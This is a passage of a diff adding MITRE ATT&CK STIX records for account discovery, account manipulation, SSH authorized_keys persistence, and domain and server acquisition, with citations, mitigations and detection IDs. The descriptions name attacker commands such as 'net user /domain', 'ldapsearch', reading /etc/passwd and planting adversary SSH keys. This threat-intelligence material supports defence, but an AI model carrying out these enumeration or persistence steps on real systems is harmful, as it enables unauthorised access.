+                    "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1087/002",
+                            "external_id": "T1087.002"
+                        },
+                        {
+                            "source_name": "CrowdStrike StellarParticle January 2022",
+                            "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.",
+                            "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "ExtraHop",
+                        "Miriam Wiesner, @miriamxyra, Microsoft Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:31.050000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0129: Domain Account Enumeration Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-21 21:07:55.393000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Local Account",
+                    "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS, the <code>dscl . list /Users</code> command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1087/001",
+                            "external_id": "T1087.001"
+                        },
+                        {
+                            "source_name": "id man page",
+                            "description": "MacKenzie, D. and Robbins, A. (n.d.). id(1) - Linux man page. Retrieved January 11, 2024.",
+                            "url": "https://linux.die.net/man/1/id"
+                        },
+                        {
+                            "source_name": "groups man page",
+                            "description": "MacKenzie, D. and Youngman, J. (n.d.). groups(1) - Linux man page. Retrieved January 11, 2024.",
+                            "url": "https://linux.die.net/man/1/groups"
+                        },
+                        {
+                            "source_name": "Mandiant APT1",
+                            "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+                            "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+                        },
+                        {
+                            "source_name": "Crowdstrike Hypervisor Jackpotting Pt 2 2021",
+                            "description": "Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
+                        },
+                        {
+                            "source_name": "Elastic - Koadiac Detection with EQL",
+                            "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024.",
+                            "url": "https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Daniel Stepanic, Elastic",
+                        "Miriam Wiesner, @miriamxyra, Microsoft Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-24 17:48:32.515000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0303: Local Account Enumeration Across Host Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:12.196000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Account Manipulation",
+                    "description": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1098",
+                            "external_id": "T1098"
+                        },
+                        {
+                            "source_name": "FireEye SMOKEDHAM June 2021",
+                            "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"
+                        },
+                        {
+                            "source_name": "Microsoft Security Event 4670",
+                            "description": "Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.",
+                            "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670"
+                        },
+                        {
+                            "source_name": "Microsoft User Modified Event",
+                            "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.",
+                            "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738"
+                        },
+                        {
+                            "source_name": "InsiderThreat ChangeNTLM July 2017",
+                            "description": "Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.",
+                            "url": "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM"
+                        },
+                        {
+                            "source_name": "GitHub Mimikatz Issue 92 June 2017",
+                            "description": "Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.",
+                            "url": "https://github.com/gentilkiwi/mimikatz/issues/92"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)",
+                        "Praetorian",
+                        "Tim MalcomVetter",
+                        "Wojciech Lesicki",
+                        "Arad Inbar, Fidelis Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:10.273000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.8",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1030: Network Segmentation",
+                            "M1032: Multi-factor Authentication",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0096: Account Manipulation Behavior Chain Detection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-24 12:42:35.144000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "SSH Authorized Keys",
+                    "description": "Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code> (or, on ESXi, `/etc/ssh/keys-<username>/authorized_keys`).(Citation: SSH Authorized Keys) Users may edit the system\u2019s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH.(Citation: Broadcom ESXi SSH) The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.\n\nAdversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI\u2019s \u201cadd-metadata\u201d command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1098/004",
+                            "external_id": "T1098.004"
+                        },
+                        {
+                            "source_name": "Venafi SSH Key Abuse",
+                            "description": "Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.",
+                            "url": "https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities"
+                        },
+                        {
+                            "source_name": "Broadcom ESXi SSH",
+                            "description": "Broadcom. (2024, December 12). Allowing SSH access to VMware vSphere ESXi/ESX hosts with public/private key authentication. Retrieved March 26, 2025.",
+                            "url": "https://knowledge.broadcom.com/external/article/313767/allowing-ssh-access-to-vmware-vsphere-es.html"
+                        },
+                        {
+                            "source_name": "Google Cloud Privilege Escalation",
+                            "description": "Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.",
+                            "url": "https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/"
+                        },
+                        {
+                            "source_name": "cisco_ip_ssh_pubkey_ch_cmd",
+                            "description": "Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478"
+                        },
+                        {
+                            "source_name": "Cybereason Linux Exim Worm",
+                            "description": "Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.",
+                            "url": "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability"
+                        },
+                        {
+                            "source_name": "Google Cloud Add Metadata",
+                            "description": "Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.",
+                            "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata"
+                        },
+                        {
+                            "source_name": "Azure Update Virtual Machines",
+                            "description": "Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.",
+                            "url": "https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update"
+                        },
+                        {
+                            "source_name": "SSH Authorized Keys",
+                            "description": "ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.",
+                            "url": "https://www.ssh.com/ssh/authorized_keys/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tony Lambert, Red Canary",
+                        "Dror Alon, Palo Alto Networks",
+                        "Or Kliger, Palo Alto Networks",
+                        "Austin Clark, @c2defense",
+                        "Arad Inbar, Fidelis Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2025-10-24 17:48:55.005000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0126: Detection Strategy for SSH Key Injection in Authorized Keys"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-30 17:09:31.878000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Domains",
+                    "description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)\n\nDifferent URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)\n\nAdversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)\n\nIn addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor\u2019s choosing.(Citation: Invictus IR DangerDev 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1583/001",
+                            "external_id": "T1583.001"
+                        },
+                        {
+                            "source_name": "URI Unique",
+                            "description": "Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.",
+                            "url": "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF"
+                        },
+                        {
+                            "source_name": "PaypalScam",
+                            "description": "Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.",
+                            "url": "https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/"
+                        },
+                        {
+                            "source_name": "CISA IDN ST05-016",
+                            "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/tips/ST05-016"
+                        },
+                        {
+                            "source_name": "CISA MSS Sep 2020",
+                            "description": "CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-258a"
+                        },
+                        {
+                            "source_name": "bypass_webproxy_filtering",
+                            "description": "Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.",
+                            "url": "https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/"
+                        },
+                        {
+                            "source_name": "FireEye APT28",
+                            "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.",
+                            "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"
+                        },
+                        {
+                            "source_name": "Invictus IR DangerDev 2024",
+                            "description": "Invictus Incident Response. (2024, January 31). The curious case of DangerDev@protonmail.me. Retrieved March 19, 2024.",
+                            "url": "https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me"
+                        },
+                        {
+                            "source_name": "Domain_Steal_CC",
+                            "description": "Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it\u2019s Now Stealing Credit Cards. Retrieved September 20, 2019.",
+                            "url": "https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/"
+                        },
+                        {
+                            "source_name": "tt_obliqueRAT",
+                            "description": "Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022.",
+                            "url": "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html"
+                        },
+                        {
+                            "source_name": "tt_httrack_fake_domains",
+                            "description": "Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.",
+                            "url": "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html"
+                        },
+                        {
+                            "source_name": "Mandiant APT1",
+                            "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+                            "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+                        },
+                        {
+                            "source_name": "Categorisation_not_boundary",
+                            "description": "MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.",
+                            "url": "https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/"
+                        },
+                        {
+                            "source_name": "URI",
+                            "description": "Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.",
+                            "url": "https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits"
+                        },
+                        {
+                            "source_name": "Redirectors_Domain_Fronting",
+                            "description": "Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.",
+                            "url": "https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/"
+                        },
+                        {
+                            "source_name": "URI Use",
+                            "description": "Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.",
+                            "url": "https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf"
+                        },
+                        {
+                            "source_name": "iOS URL Scheme",
+                            "description": "Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.",
+                            "url": "https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html"
+                        },
+                        {
+                            "source_name": "lazgroup_idn_phishing",
+                            "description": "RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.",
+                            "url": "https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/"
+                        },
+                        {
+                            "source_name": "httrack_unhcr",
+                            "description": "RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.",
+                            "url": "https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Wes Hurd",
+                        "Vinayak Wadhwa, Lucideus",
+                        "Deloitte Threat Library Team",
+                        "Oleg Kolesnikov, Securonix",
+                        "Menachem Goldstein",
+                        "Nikola Kovac"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2025-10-24 17:48:42.246000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0892: Detection of Domains"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 00:48:09.578000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Server",
+                    "description": "Adversaries may buy, lease, rent, or obtain physical servers\u00a0that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked) \n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1583/004",
+                            "external_id": "T1583.004"
+                        },
+                        {
+                            "source_name": "Freejacked",
+                            "description": "Clark, Michael. (2023, August 14). Google\u2019s Vertex AI Platform Gets Freejacked. Retrieved February 28, 2024.",
+                            "url": "https://sysdig.com/blog/googles-vertex-ai-platform-freejacked/"
+                        },
+                        {
+                            "source_name": "Free Trial PurpleUrchin",
